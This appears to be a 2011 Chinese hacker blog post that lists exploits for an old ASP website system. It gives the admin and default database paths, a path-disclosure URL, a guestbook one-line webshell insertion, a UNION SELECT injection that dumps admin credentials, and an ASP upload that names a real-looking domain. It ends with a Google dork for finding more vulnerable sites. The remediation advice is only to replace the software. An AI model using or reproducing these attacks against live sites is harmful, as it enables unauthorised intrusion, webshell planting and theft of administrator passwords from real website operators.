by Mr.DzY

date 2011/7/17

这个系统算得上很古老了,今天偶然碰上。发现了一些问题。

网上搜了一下,发现很早就有大牛发了一篇文章。写得很是

详细。时至今日,同样的网站还是一样,虽然修复了不少地方,

但是可利用的,还是很多很多。没什么含量,发出来大家学习下。

后台:data/login.asp
默认数据库:data/database.asa


Exploit如下:

1、无容错语句,可暴库
利用方法: http://www.test.com/inc%5cconn.asp 访问即可. (注意将IE中二个显示友好url去掉)


2、字符过漏不严,可插入一句话木马
利用方法:http://www.test.com/gb.asp 插入一句话后,菜刀连接之(数据库)。

3、注入漏洞
利用方法:http://www.test.com/news_view.asp?id=26 union select 1,user_id,user_pwd,4,5 from admin

即可爆出管理帐号和明文的密码(竟然没经过md5加密,看来的确很老了)。

4、上传漏洞(基本上没有了,试下人品.)
利用方法: http://www.test.com/upfile.htm 直接上传asp 或工具提交:http://www.0855.tv/upfile.asp


修复:还是换程序吧,像这样什么也没过滤的,不多见了。

扔2个关键字google:

inurl:info_view.asp?id= 信息反馈您的姓名您的公司EMAIL或电话信息标题.

从何处得知本公司网站开通? 报刊,电视,等媒体